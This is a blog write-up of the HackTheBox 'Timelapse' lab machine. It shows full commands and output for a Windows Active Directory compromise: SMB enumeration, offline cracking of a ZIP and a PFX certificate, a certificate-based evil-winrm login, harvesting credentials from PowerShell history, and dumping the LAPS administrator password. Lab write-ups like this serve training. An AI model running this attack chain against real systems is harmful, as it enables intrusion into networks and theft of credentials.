HackTheBox – Timelapse Write-up

Hi everyone! This is a Windows machine that only test Active Directory related content during privilege escalation. For initial access, we have to enumerate SMB for a password protected ZIP file which stores a password protected PFX file. Cracking using zip2john and crackpkcs12 was done before generating a public and private key using the PFX file for winrm login. Once login, we will have to enumerate PowerShell’s command history’s file to pivot to another account that has LAPS read access. With LAPS read access, we will be able to obtain the local administrator’s password. Let’s get started!

1. Nmap enumeration

$ sudo nmap -sC -sV -p- 10.10.11.152         
PORT      STATE SERVICE           VERSION
53/tcp    open  domain            Simple DNS Plus
88/tcp    open  kerberos-sec      Microsoft Windows Kerberos (server time: 2022-07-15 10:09:34Z)
135/tcp   open  msrpc             Microsoft Windows RPC
139/tcp   open  netbios-ssn       Microsoft Windows netbios-ssn
389/tcp   open  ldap              Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http        Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ldapssl?
3268/tcp  open  ldap              Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
3269/tcp  open  globalcatLDAPssl?
5986/tcp  open  ssl/http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
| ssl-cert: Subject: commonName=dc01.timelapse.htb
| Not valid before: 2021-10-25T14:05:29
|_Not valid after:  2022-10-25T14:25:29
|_ssl-date: 2022-07-15T10:11:07+00:00; +7h59m59s from scanner time.
| tls-alpn: 
|_  http/1.1
9389/tcp  open  mc-nmf            .NET Message Framing
49667/tcp open  msrpc             Microsoft Windows RPC
49673/tcp open  ncacn_http        Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc             Microsoft Windows RPC
49696/tcp open  msrpc             Microsoft Windows RPC
56370/tcp open  msrpc             Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 7h59m58s, deviation: 0s, median: 7h59m57s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2022-07-15T10:10:30
|_  start_date: N/A

2. SMB enumeration

Since port 445 is open, I decided to check it out if we can view any content anonymously. True enough, we can read “Shares” folder. When accessing the shared folder (just press ENTER when prompted for password), I found two interesting files. A backup file for winrm and LAPS. Knowing that LAPS exist will probably be helpful for privilege escalation later.

$ smbmap -H 10.10.11.152 -u anonymous
[+] Guest session       IP: 10.10.11.152:445    Name: 10.10.11.152                                      
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                NO ACCESS       Logon server share 
        Shares                                                  READ ONLY
        SYSVOL                                                  NO ACCESS       Logon server share 
                                                                                                                                                                                                                    
$ smbclient \\\\10.10.11.152\\Shares
Enter WORKGROUP\kali's password:
smb: \> dir
  .                                   D        0  Mon Oct 25 11:39:15 2021
  ..                                  D        0  Mon Oct 25 11:39:15 2021
  Dev                                 D        0  Mon Oct 25 15:40:06 2021
  HelpDesk                            D        0  Mon Oct 25 11:48:42 2021

                6367231 blocks of size 4096. 2455198 blocks available
smb: \> cd Dev
smb: \Dev\> dir
  .                                   D        0  Mon Oct 25 15:40:06 2021
  ..                                  D        0  Mon Oct 25 15:40:06 2021
  winrm_backup.zip                    A     2611  Mon Oct 25 11:46:42 2021

                6367231 blocks of size 4096. 2455198 blocks available
smb: \Dev\> get winrm_backup.zip 
getting file \Dev\winrm_backup.zip of size 2611 as winrm_backup.zip (3.6 KiloBytes/sec) (average 3.6 KiloBytes/sec)
smb: \Dev\> cd ..
smb: \> cd HelpDesk\
smb: \HelpDesk\> dir
  .                                   D        0  Mon Oct 25 11:48:42 2021
  ..                                  D        0  Mon Oct 25 11:48:42 2021
  LAPS.x64.msi                        A  1118208  Mon Oct 25 10:57:50 2021
  LAPS_Datasheet.docx                 A   104422  Mon Oct 25 10:57:46 2021
  LAPS_OperationsGuide.docx           A   641378  Mon Oct 25 10:57:40 2021
  LAPS_TechnicalSpecification.docx      A    72683  Mon Oct 25 10:57:44 2021

3. Analysis winrm_backup.zip

3.1 Crack and access winrm_backup.zip

When I tried to unzip the ZIP file, it prompted us for a password.

$ unzip winrm_backup.zip 
Archive:  winrm_backup.zip
[winrm_backup.zip] legacyy_dev_auth.pfx password: 

We can easily crack the ZIP file using zip2john.

$ zip2john ./winrm_backup.zip > zip.hashes
$ sudo gunzip /usr/share/wordlists/rockyou.txt.gz
$ john ./zip.hashes --wordlist=/usr/share/wordlists/rockyou.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
supremelegacy    (winrm_backup.zip/legacyy_dev_auth.pfx)
1g 0:00:00:00 DONE (2022-07-14 23:28) 3.125g/s 10854Kp/s 10854Kc/s 10854KC/s surfroxy154..supergay01
Use the "--show" option to display all of the cracked passwords reliably
Session completed

$ unzip winrm_backup.zip
Archive:  winrm_backup.zip
[winrm_backup.zip] legacyy_dev_auth.pfx password: supremelegacy
  inflating: legacyy_dev_auth.pfx

3.2 Crack and read .pfx file

When I tried to read the .pfx file, a password prompt appeared.

$ openssl pkcs12 -info -in ./legacyy_dev_auth.pfx
Enter Import Password:

To crack the file, we will first have to install crackpkcs12. Copy and paste the following commands into the terminal.

git clone https://github.com/crackpkcs12/crackpkcs12.git
cd crackpkcs12*
./configure
make
sudo make install

Finally, we can start to crack it.

$ cd ..
$ crackpkcs12 -d /usr/share/wordlists/rockyou.txt ./legacyy_dev_auth.pfx

Dictionary attack - Starting 4 threads

*********************************************************
Dictionary attack - Thread 1 - Password found: thuglegacy
*********************************************************

We can now generate the private and public keys since we have the password.

$ openssl pkcs12 -in ./legacyy_dev_auth.pfx -nocerts -out private.pem -nodes 
Enter Import Password: thuglegacy
$ openssl pkcs12 -in ./legacyy_dev_auth.pfx -out public.pem -clcerts -nokeys 
Enter Import Password: thuglegacy

4. Initial access using winrm

We access the machine using evil-winrm along with our generated keys without the need for username or password. Ref: https://wadcoms.github.io/wadcoms/Evil-Winrm-PKINIT/

$ sudo gem install evil-winrm
$ evil-winrm -i 10.10.11.152 -c public.pem -k private.pem -S -r timelapse

Evil-WinRM shell v3.4

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Warning: SSL enabled

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\legacyy\Documents> 

4.1 Obtaining the user flag

*Evil-WinRM* PS C:\Users\legacyy\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\legacyy\Desktop> dir


    Directory: C:\Users\legacyy\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        7/15/2022   5:27 AM             34 user.txt


*Evil-WinRM* PS C:\Users\legacyy\Desktop> type user.txt
ca*****************************

5. Privilege escalation

5.1 Discovering another user

While looking at the user accounts available, I noticed that there is another interesting user, svc_deploy. Looking at svc_deploy, we can see that it is part of the LAPS_Readers group. I didn’t show legacyy or other user accounts’ information here but the all the other account we are in is not part of that group and hence it cannot read the local administrator’s password.

*Evil-WinRM* PS C:\Users\legacyy\Documents> net users

User accounts for \\

-------------------------------------------------------------------------------
Administrator            babywyrm                 Guest
krbtgt                   legacyy                  payl0ad
sinfulz                  svc_deploy               thecybergeek               

The command completed with one or more errors.

*Evil-WinRM* PS C:\Users\legacyy\Documents> net user svc_deploy
User name                    svc_deploy
Full Name                    svc_deploy
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            10/25/2021 12:12:37 PM
Password expires             Never
Password changeable          10/26/2021 12:12:37 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   7/15/2022 5:57:46 AM

Logon hours allowed          All

Local Group Memberships      *Remote Management Use
Global Group memberships     *LAPS_Readers         *Domain Users
The command completed successfully.

5.2 Getting logging credentials via command history

While enumerating, I stumbled across svc_deploy‘s login credentials in PowerShell console’s history.

*Evil-WinRM* PS C:\Users\legacyy\Documents> type C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -
SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exit

5.3 Login as svc_deploy

$ evil-winrm -i 10.10.11.152 -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV' -S -r timelapse -s /home/kali

Evil-WinRM shell v3.4

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Warning: SSL enabled

Warning: User is not needed for Kerberos auth. Ticket will be used

Warning: Password is not needed for Kerberos auth. Ticket will be used

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc_deploy\Documents> 

5.4 Obtaining local admin’s password via LAPS

We can easily obtain LAPS password via this available Get-LAPSPasswords.ps1 script. Remember to download into your attacking machine before loading the script and run it. I already set the script path via -s flag in evil-winrm before logging in to svc_deploy‘s account.

*Evil-WinRM* PS C:\Users\svc_deploy\Documents> Get-LAPSPasswords.ps1
*Evil-WinRM* PS C:\Users\svc_deploy\Documents> Get-LAPSPasswords


Hostname   : dc01.timelapse.htb
Stored     : 1
Readable   : 1
Password   : }-%o9e8]&333-n+(VEi30J-}
Expiration : 7/20/2022 10:52:04 AM

Hostname   : dc01.timelapse.htb
Stored     : 1
Readable   : 1
Password   : }-%o9e8]&333-n+(VEi30J-}
Expiration : 7/20/2022 10:52:04 AM

Hostname   :
Stored     : 0
Readable   : 0
Password   :
Expiration : NA

Hostname   : dc01.timelapse.htb
Stored     : 1
Readable   : 1
Password   : }-%o9e8]&333-n+(VEi30J-}
Expiration : 7/20/2022 10:52:04 AM

Hostname   :
Stored     : 0
Readable   : 0
Password   :
Expiration : NA

Hostname   :
Stored     : 0
Readable   : 0
Password   :
Expiration : NA

Hostname   : dc01.timelapse.htb
Stored     : 1
Readable   : 1
Password   : }-%o9e8]&333-n+(VEi30J-}
Expiration : 7/20/2022 10:52:04 AM

Hostname   :
Stored     : 0
Readable   : 0
Password   :
Expiration : NA

Hostname   :
Stored     : 0
Readable   : 0
Password   :
Expiration : NA

Hostname   :
Stored     : 0
Readable   : 0
Password   :
Expiration : NA

Note that since the password is auto generated, your obtained password for the local administrator will definitely be different from mine. You will have to login to svc_deploy‘s account to retrieve the local administrator’s password.

5.5 Login as administrator

Since we have the password, we can now login as Administrator.

$ evil-winrm -i 10.10.11.152 -u administrator -p '}-%o9e8]&333-n+(VEi30J-}' -S -r timelapse

Evil-WinRM shell v3.4

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Warning: SSL enabled

Warning: User is not needed for Kerberos auth. Ticket will be used

Warning: Password is not needed for Kerberos auth. Ticket will be used

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> 

5.6 Obtaining the root flag

*Evil-WinRM* PS C:\Users\Administrator\Documents> dir C:\Users


    Directory: C:\Users


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----       10/23/2021  11:27 AM                Administrator
d-----       10/25/2021   8:22 AM                legacyy
d-r---       10/23/2021  11:27 AM                Public
d-----       10/25/2021  12:23 PM                svc_deploy
d-----        2/23/2022   5:45 PM                TRX


*Evil-WinRM* PS C:\Users\Administrator\Documents> cd C:\Users\TRX\Desktop
*Evil-WinRM* PS C:\Users\TRX\Desktop> dir 


    Directory: C:\Users\TRX\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        7/15/2022  10:52 AM             34 root.txt


*Evil-WinRM* PS C:\Users\TRX\Desktop> type root.txt
a5*****************************

I hope these tabs have been helpful to you. Feel free to leave any comments below. You may also send me some tips if you like my work and want to see more of such content. Funds will mostly be used for my boba milk tea addiction. The link is here. 🙂

Leave a Reply

Please log in using one of these methods to post your comment:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.